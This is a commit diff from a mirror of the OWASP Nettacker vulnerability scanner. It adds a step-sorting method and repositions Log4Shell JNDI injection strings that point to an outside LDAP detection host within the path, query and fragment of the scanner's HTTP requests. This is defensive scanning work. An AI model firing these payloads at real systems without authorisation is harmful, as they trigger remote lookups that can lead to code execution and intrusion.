mirror of https://github.com/OWASP/Nettacker.git
fix race condition error and sorting steps
This commit is contained in:
Ali Razmjoo
parent
25e4a8e2bc
commit
6089089d66
|
|
@ -142,6 +142,22 @@ class NettackerModules:
|
|||
from core.utility import expand_module_steps
|
||||
self.module_content['payloads'] = expand_module_steps(self.module_content['payloads'])
|
||||
|
||||
def sort_loops(self):
|
||||
steps = []
|
||||
for index in range(len(self.module_content['payloads'])):
|
||||
for step in copy.deepcopy(self.module_content['payloads'][index]['steps']):
|
||||
if 'dependent_on_temp_event' not in step[0]['response']:
|
||||
steps.append(step)
|
||||
|
||||
for step in copy.deepcopy(self.module_content['payloads'][index]['steps']):
|
||||
if 'dependent_on_temp_event' in step[0]['response'] and 'save_to_temp_events_only' in step[0]['response']:
|
||||
steps.append(step)
|
||||
|
||||
for step in copy.deepcopy(self.module_content['payloads'][index]['steps']):
|
||||
if 'dependent_on_temp_event' in step[0]['response'] and 'save_to_temp_events_only' not in step[0]['response']:
|
||||
steps.append(step)
|
||||
self.module_content['payloads'][index]['steps'] = steps
|
||||
|
||||
def start(self):
|
||||
from terminable_thread import Thread
|
||||
from core.utility import wait_for_threads_to_finish
|
||||
|
|
@ -334,6 +350,7 @@ def perform_scan(options, target, module_name, scan_unique_id, process_number, t
|
|||
validate_module.target = target
|
||||
validate_module.load()
|
||||
validate_module.generate_loops()
|
||||
validate_module.sort_loops()
|
||||
validate_module.start()
|
||||
verbose_event_info(
|
||||
messages("finished_parallel_module_scan").format(
|
||||
|
|
|
|||
|
|
@ -110,8 +110,8 @@ payloads:
|
|||
data:
|
||||
path:
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/?q=dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/#/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "?q=${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "#/${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- ""
|
||||
schema:
|
||||
- "http"
|
||||
|
|
@ -200,8 +200,8 @@ payloads:
|
|||
data:
|
||||
path:
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/?q=dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/#/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "?q=${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "#/${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- ""
|
||||
schema:
|
||||
- "http"
|
||||
|
|
@ -290,8 +290,8 @@ payloads:
|
|||
data:
|
||||
path:
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/?q=dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/#/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "?q=${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "#/${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- ""
|
||||
schema:
|
||||
- "http"
|
||||
|
|
@ -379,8 +379,8 @@ payloads:
|
|||
data:
|
||||
path:
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/?q=dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/#/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "?q=${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "#/${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- ""
|
||||
schema:
|
||||
- "http"
|
||||
|
|
@ -472,8 +472,8 @@ payloads:
|
|||
data:
|
||||
path:
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/?q=dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/#/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "?q=${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "#/${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- ""
|
||||
schema:
|
||||
- "http"
|
||||
|
|
@ -562,8 +562,8 @@ payloads:
|
|||
data:
|
||||
path:
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/?q=dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/#/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "?q=${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "#/${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- ""
|
||||
schema:
|
||||
- "http"
|
||||
|
|
@ -652,8 +652,8 @@ payloads:
|
|||
data:
|
||||
path:
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/?q=dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "${{jndi:ldap://log4shell.huntress.com:1389/#/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "?q=${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- "#/${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
|
||||
- ""
|
||||
schema:
|
||||
- "http"
|
||||
|
|
|
|||
Loading…
Reference in New Issue